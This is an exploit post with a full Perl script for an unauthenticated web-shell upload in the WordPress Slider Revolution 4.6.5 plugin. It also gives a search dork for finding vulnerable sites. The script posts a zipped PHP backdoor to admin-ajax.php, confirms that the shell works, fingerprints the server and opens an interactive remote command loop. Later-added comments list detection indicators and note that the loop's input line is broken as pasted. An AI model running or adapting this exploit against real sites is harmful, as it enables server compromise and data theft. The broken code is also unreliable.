==================================================================================================================================== |
# Title : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit | |
# Author : indoushka | |
# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | |
# Vendor : https://www.sliderrevolution.com/ | |
# Dork : index off revslider\backup |
====================================================================================================================================
[+] poc :
[+] Web shell upload : The following perl exploit will attempt to load the HTTP php shell through the update_plugin function To use the exploit, be sure to compress the backdoor file Because the exploit uploads a compressed file to the target
[+] simple backdoor :
[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)
[+] The exploit and the backdoor must be in the same folder and path
[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine
[+] Perl exploit :
#!/usr/bin/perl
#
# Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit
# Author :indoushka
# Vendor :https://www.sliderrevolution.com/
#
# NOTE(review): the script body is reproduced as it appears on the page, with
# whitespace restored only. The added comments are defender-facing: they name
# the request shape, the on-disk artifact and the response strings that a
# detection rule or an incident-response check can key on.

use LWP::UserAgent;
use MIME::Base64;
use strict;

# Clears the console and prints the usage banner. `color a` is a Windows
# console colour command.
sub banner {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    print " ============[+] Author : indoushka[+]===================\n";
    print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n";
    print " ======================================================== \n";
    print "[+] Uploading an web shell: [+]\n";
    print "[+] The following perl exploit will attempt to load the [+]\n";
    print "[+] HTTP php backdoor through the update_plugin function [+]\n";
    print "[+] To use the exploit, make sure you compress the backdoor[+]\n";
    print "============================================================== \n";
    system('color a');
}

# Two positional arguments are expected: the site's base URL and a plugin name.
if (!defined ($ARGV[0] && $ARGV[1])) {
    banner();
    print "perl $0 \n";
    print "perl $0 http://localhost revslider\n";
    exit;
}

# The archive that gets uploaded must already exist in the working directory.
my $zip1 = "indoushka.zip";
unless (-e ($zip1)) {
    banner();
    print "[-] $zip1 not found! RTFM\n";
    exit;
}

my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;
# Maps the plugin name to its AJAX action. $update_file is only assigned in
# the revslider branch; the showbiz branch leaves it undef.
if ($plugin eq "revslider") {
    $action = "revslider_ajax_action";
    $update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
    $action = "showbiz_ajax_action";
}
else {
    banner();
    print "[-] Wrong plugin name\n";
    print "perl $0 \n";
    print "perl $0 http://localhost revslider\n";
    exit;
}

# Detection / IR note: every request in this script goes to admin-ajax.php,
# and the uploaded archive is expected to end up under the plugin's
# temp/update_extract/ directory. Unexpected PHP files in that path, or POSTs
# to admin-ajax.php carrying client_action=update_plugin without a WordPress
# session cookie (see the empty Cookie header below), are the indicators.
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";

# Returns one of a fixed set of browser User-Agent strings at random. Matching
# on these exact strings is a weak signal; the request shape is the better one.
sub randomagent {
    my @array = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
    );
    my $random = $array[rand @array];
    return($random);
}

my $useragent = randomagent();
# TLS hostname verification is switched off, so an HTTPS target with a
# mismatched or self-signed certificate is accepted without complaint.
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);

# Reachability check against admin-ajax.php before anything is sent.
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
    banner();
    print "[-] Xploit failed: " . $status->status_line . "\n";
    exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

# The one request that matters: a multipart POST with an empty Cookie header
# (no session), action=<plugin>_ajax_action, client_action=update_plugin and
# the archive as the update_file part. A WAF or access-log rule can match on
# exactly that tuple.
my $exploit = $ua->post("$host/$target",
    Cookie => "",
    Content_Type => "form-data",
    Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
print "[*] Sent payload\n";

# Response triage. "Wrong update extracted folder" is treated as success —
# presumably the archive has already been unpacked by the time that check
# fails, which is why the file is then looked for under update_extract/.
# "Wrong request" is read as a version that rejects the call up front, and a
# bare trailing 0 as the AJAX action not being registered at all.
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
    print "[+] Payload successfully executed\n";
}
elsif ($exploit->decoded_content =~ /Wrong request/) {
    print "[-] Payload failed: Not vulnerable\n";
    exit;
}
elsif ($exploit->decoded_content =~ m/0$/) {
    print "[-] Payload failed: Plugin unavailable\n";
    exit;
}
else {
    # Pulls the text following a closing </b> tag out of the error page; the
    # pattern spans a literal newline as pasted. $1 is used below without a
    # match guard, hence the `unless (defined $1)` fallback.
    $exploit->decoded_content =~ /<\/b>(.*?)
/;
    print "[-] Payload failed:$1\n";
    print "[-] " . $exploit->decoded_content unless (defined $1);
    print "\n";
    exit;
}

print "[*] Checking if shell was uploaded\n";

# Random token of the given length drawn from the remaining arguments.
sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');

# Post-upload verification: the dropped file is driven over GET with a
# base64-encoded `cmd` query parameter and is expected to echo the token back.
# Detection note: GET requests with base64 in a `cmd` parameter against a file
# under a plugin's temp directory are a high-confidence web-shell signal. The
# "system() has been disabled" branch shows PHP's disable_functions working as
# a mitigation against this particular backdoor.
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");
if ($status->decoded_content =~ /system\(\) has been disabled/) {
    print "[-] Xploit failed: system() has been disabled\n";
    exit;
}
elsif ($status->decoded_content !~ /$rndstr/) {
    print "[-] Xploit failed: " . $status->status_line . "\n";
    exit;
}
elsif ($status->decoded_content =~ /$rndstr/) {
    print "[+] Shell successfully uploaded\n";
}

# Host fingerprinting through the dropped file; each call is one more
# access-log entry against $shell with a base64 `cmd` value.
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

# Interactive loop: each typed line is base64-encoded and sent as the `cmd`
# parameter. As pasted on this page the `my $cmd=` statement is incomplete,
# so the loop does not compile in the form shown here.
while () {
    print "\n$wa\@$un:~\$ ";
    chomp(my $cmd=);
    if ($cmd eq "exit") {
        print "Aurevoir!\n";
        exit;
    }
    my $ucmd = encode_base64("$cmd");
    my $output = $ua->get("$host/$shell?cmd=$ucmd");
    print $output->decoded_content;
}
Greetings to :========================================================================================================================= |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg | |
=======================================================================================================================================